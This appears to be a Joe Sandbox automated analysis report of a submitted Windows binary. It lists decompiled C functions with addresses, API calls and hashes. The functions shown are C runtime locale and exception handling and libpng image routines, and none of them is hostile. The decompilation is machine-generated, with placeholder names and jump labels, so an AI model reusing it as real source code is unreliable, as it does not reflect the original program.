										_push( &_v468);
										_t188 = 0x83;
										L0043CE92(_t153, _t177, _t186, _v472, 0x83);
										_t212 = _t212 + 0xc;
										__eflags = _t153;
										if(_t153 == 0) {
											L30:
											_t153 = 0;
											__eflags =  *_t200;
											if( *_t200 == 0) {
												L34:
												__eflags = 0;
												 *_v484 = 0;
												goto L35;
											} else {
												_t137 = _v488;
												__eflags = _t137 - _t188;
												if(_t137 >= _t188) {
													goto L34;
												} else {
													_t139 = E004442A7(_v484, _t188, _t200, _t137 + 1);
													_t212 = _t212 + 0x10;
													__eflags = _t139;
													if(_t139 == 0) {
														L35:
														_t188 = _v500;
														goto L36;
													} else {
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														L43:
														_t93 = E00439530(_t153, _t186);
														asm("int3");
														_push(_t206);
														_push(_t153);
														_push(_t200);
														_t201 = 0;
														__eflags = _v520;
														if(_v520 <= 0) {
															L49:
															return _t93;
														} else {
															_push(_t188);
															_t189 =  &_a8;
															while(1) {
																_t189 = _t189 + 4;
																_t93 = E0044423B(_v0, _a4,  *_t189);
																_t212 = _t212 + 0xc;
																__eflags = _t93;
																if(_t93 != 0) {
																	break;
																}
																_t201 = _t201 + 1;
																__eflags = _t201 - _a8;
																if(_t201 < _a8) {
																	continue;
																} else {
																	goto L49;
																}
																goto L65;
															}
															_push(0);
															_push(0);
															_push(0);
															_push(0);
															_push(0);
															E00439530(0, _t186);
															asm("int3");
															_push(0x14);
															_push(0x467b90);
															E004391D0(0, _t189, _t201);
															_t156 = 0;
															_v36 = 0;
															__eflags = _v0 - 5;
															if(__eflags <= 0) {
																_t203 = L0043CC0F(_t189, __eflags);
																_v40 = _t203;
																E0043C962(0, _t186, _t189, _t203, __eflags);
																 *(_t203 + 0x70) =  *(_t203 + 0x70) | 0x00000010;
																_v12 = _v12 & 0;
																_t190 = E004374B4(0xb8, 1);
																_v44 = _t190;
																__eflags = _t190;
																if(_t190 != 0) {
																	L00435DD9(_t186, 0xc);
																	_v12 = 1;
																	E0043D02A(_t190,  *((intOrPtr*)(_t203 + 0x6c)));
																	_v12 = _v12 & 0x00000000;
																	E0043D4C0();
																	_t105 = E0043D67B(_t186, _t190, _t203, _t190, _v0, _a4); // executed
																	_t156 = _t105;
																	_v36 = _t156;
																	__eflags = _t156;
																	if(_t156 == 0) {
																		E0043C8C7(_t190);
																		_t98 = E0043C76D(_t190);
																	} else {
																		__eflags = _a4;
																		if(_a4 != 0) {
																			_t115 = E004460A8(_a4, 0x46a208);
																			__eflags = _t115;
																			if(_t115 != 0) {
																				 *0x46c3f0 = 1;
																			}
																		}
																		L00435DD9(_t186, 0xc);
																		_v12 = 2;
																		_t73 = _t203 + 0x6c; // 0x6c
																		E0043C9DE(_t73, _t190);
																		E0043C8C7(_t190);
																		__eflags =  *(_t203 + 0x70) & 0x00000002;
																		if(( *(_t203 + 0x70) & 0x00000002) == 0) {
																			__eflags =  *0x46a434 & 0x00000001;
																			if(( *0x46a434 & 0x00000001) == 0) {
																				E0043C9DE(0x46a374,  *((intOrPtr*)(_t203 + 0x6c)));
																				_t172 =  *0x46a374; // 0x3275c8
																				 *0x469a70 =  *((intOrPtr*)(_t172 + 0x84));
																				 *0x469a60 =  *((intOrPtr*)(_t172 + 0x90));
																				 *0x46a430 =  *((intOrPtr*)(_t172 + 0x74));
																			}
																		}
																		_v12 = _v12 & 0x00000000;
																		_t98 = E0043D4CF();
																	}
																}
																_v12 = 0xfffffffe;
																E0043D502(_t98, _t203);
																_t100 = _t156;
															} else {
																 *((intOrPtr*)(L00437D6A(__eflags))) = 0x16;
																E00439520();
																_t100 = 0;
															}
															return E00439215(_t100);
														}
													}
												}
											}
										} else {
											_t148 = E004442A7(_t153, _a20,  &_v180, L00437E2A( &_v180) + 1);
											_t212 = _t212 + 0x14;
											__eflags = _t148;
											if(_t148 == 0) {
												goto L30;
											} else {
												goto L42;
											}
										}
									}
								}
							} else {
								_t149 = E004460A8(_v472, _t200);
								__eflags = _t149;
								if(_t149 == 0) {
									L36:
									__eflags = _t188;
									if(_t188 != 0) {
										L00433F90(_t188, _v476, 4);
										_t212 = _t212 + 0xc;
									}
									_t153 = _v472;
									_t200 = _v496;
									_t135 = E0044023A(_t200, _a12, _t153);
									_t212 = _t212 + 0xc;
									__eflags = _t135;
									if(_t135 != 0) {
										goto L42;
									} else {
										_t125 = _t153;
										goto L2;
									}
								} else {
									_t150 = E004460A8(_v484, _t200);
									__eflags = _t150;
									if(_t150 == 0) {
										goto L36;
									} else {
										goto L13;
									}
								}
							}
						} else {
							__eflags = _t200[0] - _t91;
							if(_t200[0] != _t91) {
								goto L10;
							} else {
								_t200 = _v496;
								_t151 = E0044023A(_t200, _a12, 0x45ce60);
								_t212 = _t212 + 0xc;
								__eflags = _t151;
								if(_t151 != 0) {
									goto L42;
								} else {
									__eflags = _t188;
									if(_t188 != 0) {
										 *_t188 = _t151;
									}
									_t125 = _t200;
									goto L2;
								}
							}
						}
					}
				} else {
					L1:
					_t125 = 0;
					L2:
					_pop(_t197);
					_pop(_t204);
					_pop(_t157);
					return L00436D7B(_t125, _t157, _v8 ^ _t206, _t186, _t197, _t204);
				}
				L65:
			}

0x0043d056
0x0043d057
0x0043d059
0x0043d05f
0x0043d066
0x0043d06c
0x0043d06d
0x0043d070
0x0043d071
0x0043d074
0x0043d075
0x0043d078
0x0043d07e
0x0043d084
0x0043d089
0x0043d08f
0x0043d095
0x0043d09b
0x0043d0a1
0x0043d0a7
0x0043d0af
0x0043d0b7
0x0043d0d5
0x0043d0dc
0x0043d0e1
0x0043d0e4
0x0043d0e6
0x0043d33e
0x0043d33e
0x0043d340
0x0043d341
0x0043d342
0x0043d343
0x0043d344
0x00000000
0x0043d0ec
0x0043d0ec
0x0043d0f0
0x0043d121
0x0043d122
0x0043d128
0x0043d12e
0x0043d133
0x0043d161
0x0043d161
0x0043d175
0x0043d17b
0x0043d17e
0x0043d184
0x0043d185
0x0043d187
0x0043d200
0x00000000
0x0043d189
0x0043d189
0x0043d18f
0x0043d190
0x0043d192
0x0043d198
0x0043d199
0x0043d19a
0x0043d1a3
0x0043d19c
0x0043d19c
0x0043d19c
0x0043d1a8
0x0043d1ab
0x0043d1ad
0x0043d206
0x0043d207
0x0043d20d
0x0043d20f
0x0043d32d
0x0043d332
0x0043d335
0x0043d337
0x00000000
0x0043d339
0x00000000
0x0043d339
0x0043d215
0x0043d224
0x0043d229
0x0043d22c
0x0043d22e
0x0043d23a
0x0043d23a
0x0043d240
0x0043d230
0x0043d230
0x0043d236
0x0043d238
0x00000000
0x00000000
0x0043d238
0x0043d249
0x0043d251
0x0043d25f
0x0043d264
0x0043d267
0x0043d269
0x00000000
0x0043d26f
0x0043d275
0x0043d27a
0x0043d27d
0x0043d27f
0x00000000
0x0043d285
0x0043d28f
0x0043d294
0x0043d297
0x0043d299
0x00000000
0x0043d29f
0x0043d29f
0x00000000
0x0043d29f
0x0043d299
0x0043d27f
0x0043d269
0x0043d1af
0x0043d1b5
0x0043d1b6
0x0043d1c2
0x0043d1c7
0x0043d1ca
0x0043d1cc
0x0043d2a4
0x0043d2a4
0x0043d2a6
0x0043d2a9
0x0043d2d2
0x0043d2d8
0x0043d2da
0x00000000
0x0043d2ab
0x0043d2ab
0x0043d2b1
0x0043d2b3
0x00000000
0x0043d2b5
0x0043d2bf
0x0043d2c4
0x0043d2c7
0x0043d2c9
0x0043d2dd
0x0043d2dd
0x00000000
0x0043d2cb
0x0043d2cb
0x0043d2cc
0x0043d2cd
0x0043d2ce
0x0043d2cf
0x0043d345
0x0043d345
0x0043d34a
0x0043d34b
0x0043d34e
0x0043d351
0x0043d352
0x0043d354
0x0043d357
0x0043d37b
0x0043d37e
0x0043d359
0x0043d359
0x0043d35a
0x0043d35d
0x0043d35d
0x0043d368
0x0043d36d
0x0043d370
0x0043d372
0x00000000
0x00000000
0x0043d374
0x0043d375
0x0043d378
0x00000000
0x0043d37a
0x00000000
0x0043d37a
0x00000000
0x0043d378
0x0043d37f
0x0043d380
0x0043d381
0x0043d382
0x0043d383
0x0043d384
0x0043d389
0x0043d38a
0x0043d38c
0x0043d391
0x0043d396
0x0043d398
0x0043d39b
0x0043d39f
0x0043d3bd
0x0043d3bf
0x0043d3c2
0x0043d3c7
0x0043d3cb
0x0043d3dc
0x0043d3de
0x0043d3e1
0x0043d3e3
0x0043d3eb
0x0043d3f1
0x0043d3fc
0x0043d403
0x0043d407
0x0043d413
0x0043d41b
0x0043d41d
0x0043d420
0x0043d422
0x0043d4db
0x0043d4e1
0x0043d428
0x0043d428
0x0043d42c
0x0043d436
0x0043d43d
0x0043d43f
0x0043d441
0x0043d441
0x0043d43f
0x0043d44d
0x0043d453
0x0043d45a
0x0043d45f
0x0043d465
0x0043d46d
0x0043d471
0x0043d473
0x0043d47a
0x0043d484
0x0043d48b
0x0043d497
0x0043d4a2
0x0043d4aa
0x0043d4aa
0x0043d47a
0x0043d4af
0x0043d4b3
0x0043d4b3
0x0043d422
0x0043d4e8
0x0043d4ef
0x0043d4f4
0x0043d3a1
0x0043d3a6
0x0043d3ac
0x0043d3b1
0x0043d3b1
0x0043d4fb
0x0043d4fb
0x0043d357
0x0043d2c9
0x0043d2b3
0x0043d1d2
0x0043d1eb
0x0043d1f0
0x0043d1f3
0x0043d1f5
0x00000000
0x0043d1fb
0x00000000
0x0043d1fb
0x0043d1f5
0x0043d1cc
0x0043d1ad
0x0043d135
0x0043d13c
0x0043d143
0x0043d145
0x0043d2e3
0x0043d2e3
0x0043d2e5
0x0043d2f0
0x0043d2f5
0x0043d2f5
0x0043d2f8
0x0043d2fe
0x0043d309
0x0043d30e
0x0043d311
0x0043d313
0x00000000
0x0043d315
0x0043d315
0x00000000
0x0043d315
0x0043d14b
0x0043d152
0x0043d159
0x0043d15b
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d15b
0x0043d145
0x0043d0f2
0x0043d0f2
0x0043d0f6
0x00000000
0x0043d0f8
0x0043d0f8
0x0043d107
0x0043d10c
0x0043d10f
0x0043d111
0x00000000
0x0043d117
0x0043d117
0x0043d119
0x0043d11b
0x0043d11b
0x0043d11d
0x00000000
0x0043d11d
0x0043d111
0x0043d0f6
0x0043d0f0
0x0043d0b9
0x0043d0b9
0x0043d0b9
0x0043d0bb
0x0043d0be
0x0043d0bf
0x0043d0c2
0x0043d0c9
0x0043d0c9
0x00000000

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

_wcscmp.LIBCMT ref: 0043D13C
_wcscmp.LIBCMT ref: 0043D152
___lc_wcstolc.LIBCMT ref: 0043D17E
___get_qualified_locale.LIBCMT ref: 0043D1A3

Part of subcall function 004466C2: _TranslateName.LIBCMT ref: 00446702
Part of subcall function 004466C2: _GetLocaleNameFromLangCountry.LIBCMT ref: 0044671B
Part of subcall function 004466C2: _TranslateName.LIBCMT ref: 00446736
Part of subcall function 004466C2: _GetLocaleNameFromLangCountry.LIBCMT ref: 0044674C
Part of subcall function 004466C2: IsValidCodePage.KERNEL32(00000000,?,?,00000055,?,?,0043D1A8,?,?,?,?,00000004,?,00000000), ref: 004467A0

GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 0043D23A
_memmove.LIBCMT ref: 0043D2F0
__invoke_watson.LIBCMT ref: 0043D345

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Name$CountryFromLangLocaleTranslate_wcscmp$CodePageValid___get_qualified_locale___lc_wcstolc__getptd_noexit__invoke_watson_memmove
String ID:
API String ID: 90596148-0
Opcode ID: 0378d839ac234d9336bcaff90fe4d621fc6537edc1e229c1b0f38ca475861603
Instruction ID: ed00f30c2e0e928437699f5b5c7efbf1b158f3f7700733191f293501a2850cb2
Opcode Fuzzy Hash: 0378d839ac234d9336bcaff90fe4d621fc6537edc1e229c1b0f38ca475861603
Instruction Fuzzy Hash: AC719171D002155BEB21AF61DC42BEF77B8AF58354F1410EBFD08E2241EA39DE818B99

Uniqueness

Uniqueness Score: -1,00%

Function 0040AA10, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040AB26

Strings

png_image_finish_read: damaged PNG_IMAGE_VERSION, xrefs: 0040AC2D
png_image_finish_read: row_stride too large, xrefs: 0040AC12
png_image_finish_read: image too large, xrefs: 0040ABE8
png_image_finish_read: invalid argument, xrefs: 0040ABFD
png_image_finish_read[color-map]: no color-map, xrefs: 0040ABD3

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memset
String ID: png_image_finish_read: damaged PNG_IMAGE_VERSION$png_image_finish_read: image too large$png_image_finish_read: invalid argument$png_image_finish_read: row_stride too large$png_image_finish_read[color-map]: no color-map
API String ID: 2102423945-1887679088
Opcode ID: 5be366c4da0d302ac9a8196a395377b94d782ea327c281b0317a8fd59f7ba060
Instruction ID: 76ad963de5bea7375dd618cf6dae6cd278386090d072185318fae89f49677a81
Opcode Fuzzy Hash: 5be366c4da0d302ac9a8196a395377b94d782ea327c281b0317a8fd59f7ba060
Instruction Fuzzy Hash: 35611D75A04308EBDB08DF54D985BDE77B2FB44344F14812AF8056B381D778EAA1CB9A

Uniqueness

Uniqueness Score: -1,00%

Function 00424F20, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 173COMMON

Download Yara Rule

Strings

Memory allocation failed while processing sCAL, xrefs: 0042506B, 004250EC
Invalid sCAL height, xrefs: 00425023
Invalid sCAL unit, xrefs: 00424F51
Invalid sCAL width, xrefs: 00424FBA

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: Invalid sCAL height$Invalid sCAL unit$Invalid sCAL width$Memory allocation failed while processing sCAL
API String ID: 0-3374849547
Opcode ID: 576405928d6b80ecf87c490bc76e620a6d8dbe9e0fc23c87660bfd93e59419ba
Instruction ID: 112a8db3258ebaae470b0bbc9d0ab89ba1e17b3a9d7dfd9749283c684fa1ca46
Opcode Fuzzy Hash: 576405928d6b80ecf87c490bc76e620a6d8dbe9e0fc23c87660bfd93e59419ba
Instruction Fuzzy Hash: 4A713B75E00209AFCB04CF94E885BEEBBB1EF88304F14C15AE9195B351D7799A85CF94

Uniqueness

Uniqueness Score: -1,00%

Function 00436699, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00436699(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				void* _t45;
				signed int _t49;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr* _t63;
				intOrPtr _t69;
				signed int* _t72;
				void* _t74;
				void* _t75;

				_t57 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t63 = _a4;
				_t76 =  *_t63 - 0x80000003;
				if( *_t63 == 0x80000003) {
					L19:
					return _t44;
				}
				_t45 = L0043CC0F(_t63, _t76);
				_t77 =  *((intOrPtr*)(_t45 + 0x80));
				_t54 = _a20;
				if( *((intOrPtr*)(_t45 + 0x80)) == 0) {
					L6:
					if( *((intOrPtr*)(_t54 + 0xc)) == 0) {
						L0043BB80();
					}
					_t44 = E0043263B(_t57, _t54, _a28, _a24,  &_v12,  &_v8);
					_t58 = _v12;
					_t60 = _v8;
					_t75 = _t74 + 0x14;
					if(_t58 >= _t60) {
						L18:
						goto L19;
					} else {
						_t17 = _t44 + 0xc; // 0xc
						_t72 = _t17;
						_t44 = _a24;
						do {
							if(_t44 >=  *((intOrPtr*)(_t72 - 0xc)) && _t44 <=  *((intOrPtr*)(_t72 - 8))) {
								_t49 =  *_t72 << 4;
								if( *((intOrPtr*)(_t72[1] + _t49 - 0xc)) == 0) {
									L14:
									_t50 = _t49 + _t72[1] + 0xfffffff0;
									_t69 = _a4;
									if(( *(_t49 + _t72[1] + 0xfffffff0) & 0x00000040) == 0) {
										_push(1);
										_t35 = _t72 - 0xc; // 0x0
										E00436236(_t54, _t72, _t69, _a8, _a12, _a16, _t54, _t50, 0, _t35, _a28, _a32);
										_t60 = _v8;
										_t58 = _v12;
										_t75 = _t75 + 0x2c;
									}
									L16:
									_t44 = _a24;
									goto L17;
								}
								_t60 = _v8;
								_t54 = _a20;
								if( *((char*)( *((intOrPtr*)(_t72[1] + _t49 - 0xc)) + 8)) != 0) {
									goto L16;
								}
								goto L14;
							}
							L17:
							_t58 = _t58 + 1;
							_t72 =  &(_t72[5]);
							_v12 = _t58;
						} while (_t58 < _t60);
						goto L18;
					}
				}
				__imp__EncodePointer(0);
				if( *((intOrPtr*)(L0043CC0F(_t63, _t77) + 0x80)) != _t45 &&  *_t63 != 0xe0434f4d &&  *_t63 != 0xe0434352) {
					_t44 = E00432566(_t63, _a8, _a12, _a16, _t54, _a28, _a32);
					_t74 = _t74 + 0x1c;
					if(_t44 != 0) {
						goto L18;
					}
				}
			}

0x00436699
0x0043669c
0x0043669d
0x0043669f
0x004366a2
0x004366a8
0x004367b0
0x004367b2
0x004367b2
0x004366b0
0x004366b5
0x004366bc
0x004366bf
0x00436709
0x0043670d
0x0043670f
0x0043670f
0x00436723
0x00436728
0x0043672b
0x0043672e
0x00436733
0x004367ae
0x00000000
0x00436735
0x00436735
0x00436735
0x00436738
0x0043673b
0x0043673e
0x0043674a
0x00436753
0x00436768
0x0043676e
0x00436770
0x00436776
0x00436778
0x0043677d
0x00436792
0x00436797
0x0043679a
0x0043679d
0x0043679d
0x004367a0
0x004367a0
0x00000000
0x004367a0
0x0043675c
0x00436763
0x00436766
0x00000000
0x00000000
0x00000000
0x00436766
0x004367a3
0x004367a3
0x004367a4
0x004367a7
0x004367aa
0x00000000
0x0043673b
0x00436733
0x004366c3
0x004366d6
0x004366f9
0x004366fe
0x00436703
0x00000000
0x00000000
0x00436703

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

EncodePointer.KERNEL32(00000000), ref: 004366C3
_CallSETranslator.LIBCMT ref: 004366F9
_GetRangeOfTrysToCheck.LIBCMT ref: 00436723

Strings

RCC, xrefs: 004366E0
Ze, xrefs: 004366B0
MOC, xrefs: 004366D8

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: CallCheckEncodePointerRangeTranslatorTrys__getptd_noexit
String ID: MOC$RCC$Ze
API String ID: 3337196757-198941733
Opcode ID: c12afcb95c0109f504b0b07c2aef000fd56b863ebf2ac890b1857a1206ca16e7
Instruction ID: 050431b29d0fba8b7f6c17c20acfec570b5b291b782e2fb875bae865ec1a00e8
Opcode Fuzzy Hash: c12afcb95c0109f504b0b07c2aef000fd56b863ebf2ac890b1857a1206ca16e7
Instruction Fuzzy Hash: 00319C3650020ABFDF11CF44C881EAEB7A9FF48328F5AA15AF90467211D339ED51CBA4

Uniqueness

Uniqueness Score: -1,00%

Function 00401B78, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401B7D
std::_Lockit::_Lockit.LIBCPMT ref: 00401B8F

Part of subcall function 00408C9D: __lock.LIBCMT ref: 00408CAE

std::exception::exception.LIBCMT ref: 00401BD6

Part of subcall function 0043200B: std::exception::_Copy_str.LIBCMT ref: 00432024

__CxxThrowException@8.LIBCMT ref: 00401BEB

Part of subcall function 004323B9: RaiseException.KERNEL32(?,?,00408E3B,?,?,?,?,?,00408E3B,?,00467504,00405116), ref: 0043240A

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401BF4

Strings

bad locale name, xrefs: 00401BCF

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 3430881366-1405518554
Opcode ID: b44c6f66e1176a70b467a9568f8c347bd32ca3fb141639b7e828e893c5413783
Instruction ID: 662e8774e2ef9be81064d0474bf0ee7db32f2b14c6cb00dabf93d5936397e98b
Opcode Fuzzy Hash: b44c6f66e1176a70b467a9568f8c347bd32ca3fb141639b7e828e893c5413783
Instruction Fuzzy Hash: BE117071801744DEC721DFAAC18058BFBF4FF18344B40896FE49AD3A01D778A604CBA9

Uniqueness

Uniqueness Score: -1,00%

Function 00409D00, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 402COMMON

Download Yara Rule

Strings

Invalid attempt to read row data, xrefs: 00409FA8
internal sequential row size calculation error, xrefs: 0040A107
bad adaptive filter value, xrefs: 0040A039
sequential row overflow, xrefs: 0040A0E5

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID:
String ID: Invalid attempt to read row data$bad adaptive filter value$internal sequential row size calculation error$sequential row overflow
API String ID: 0-251252723
Opcode ID: 682f04134d8fe0e2aec5dc03b83843f8277e31692691895c90fc83b70deda443
Instruction ID: 18b29af83941b685922c9da6582ce56bcdbc064d37aa19458c3d856618108266
Opcode Fuzzy Hash: 682f04134d8fe0e2aec5dc03b83843f8277e31692691895c90fc83b70deda443
Instruction Fuzzy Hash: EEF19475504208ABCB04CF54C895EEA3BB1AF89344F18817AF8595F383D739EE92CB95

Uniqueness

Uniqueness Score: -1,00%

Function 0043CD49, Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 0043CD49

Part of subcall function 004315C9: RtlEncodePointer.NTDLL(00000000,?,0043CD4E,00435CDC,004677A0,00000014), ref: 004315CC
Part of subcall function 004315C9: __initp_misc_winsig.LIBCMT ref: 004315ED
Part of subcall function 004315C9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0043798B
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0043799F
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004379B2
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004379C5
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004379D8
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004379EB
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004379FE
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00437A11
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00437A24
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00437A37
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00437A4A
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00437A5D
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00437A70
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00437A83
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00437A96
Part of subcall function 004315C9: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00437AA9

__mtinitlocks.LIBCMT ref: 0043CD4E

Part of subcall function 00435F08: InitializeCriticalSectionAndSpinCount.KERNEL32(00469918,00000FA0,?,?,0043CD53,00435CDC,004677A0,00000014), ref: 00435F26

__mtterm.LIBCMT ref: 0043CD57
__calloc_crt.LIBCMT ref: 0043CD7C
GetCurrentThreadId.KERNEL32(00435CDC,004677A0,00000014), ref: 0043CDA5

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: AddressProc$CountCriticalCurrentEncodeHandleInitializeModulePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm
String ID:
API String ID: 1310578021-0
Opcode ID: 04d983b2525901c440947910af872d29406605ca518bcb8c5b171bf53448cb66
Instruction ID: 5b9703d565aad871cdfdcb4f356c671a7368b8cac3d6a6525d50bf0f378d66dc
Opcode Fuzzy Hash: 04d983b2525901c440947910af872d29406605ca518bcb8c5b171bf53448cb66
Instruction Fuzzy Hash: 25F0F672509B1119D6787B763C472872AC08B09334F20663FF4A1F92E2EF1C8841879D

Uniqueness

Uniqueness Score: -1,00%

Function 00413090, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413090(void* __eax, signed int _a4, char _a8) {
				signed int _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				void* _t137;
				void* _t228;
				void* _t229;

				if(_a4 == 0) {
					return __eax;
				}
				if( *(_a4 + 0x118) == 0 && ( *(_a4 + 0x14d) & 0x000000ff) == 0) {
					if(( *(_a4 + 0x74) & 0x00000400) == 0) {
						E0041B170(_a4, "png_write_info was never called before png_write_row");
					}
					L00428D40(_a4);
					_t228 = _t228 + 4;
				}
				if(( *(_a4 + 0x14c) & 0x000000ff) != 0 && ( *(_a4 + 0x7c) & 0x00000002) != 0) {
					_v20 =  *(_a4 + 0x14d) & 0x000000ff;
					if(_v20 <= 6) {
						switch( *((intOrPtr*)(_v20 * 4 +  &M00413418))) {
							case 0:
								if(( *(_a4 + 0x118) & 0x00000007) != 0) {
									return L00428FD0(_a4, _a4);
								}
								goto L34;
							case 1:
								__edx = _a4;
								 *(__edx + 0x118) =  *(__edx + 0x118) & 0x00000007;
								if(( *(__edx + 0x118) & 0x00000007) != 0) {
									L16:
									__edx = _a4;
									return L00428FD0(__ecx, _a4);
								}
								__ecx = _a4;
								if( *((intOrPtr*)(__ecx + 0x100)) < 5) {
									goto L16;
								}
								goto L34;
							case 2:
								__eax = _a4;
								__ecx =  *(__eax + 0x118);
								__ecx =  *(__eax + 0x118) & 0x00000007;
								if(__ecx != 4) {
									__edx = _a4;
									return L00428FD0(__ecx, _a4);
								}
								goto L34;
							case 3:
								__eax = _a4;
								__ecx =  *(__eax + 0x118);
								__ecx =  *(__eax + 0x118) & 0x00000003;
								if(__ecx != 0) {
									L23:
									__eax = _a4;
									return L00428FD0(__ecx, _a4);
								}
								__edx = _a4;
								if( *((intOrPtr*)(_a4 + 0x100)) < 3) {
									goto L23;
								}
								goto L34;
							case 4:
								__ecx = _a4;
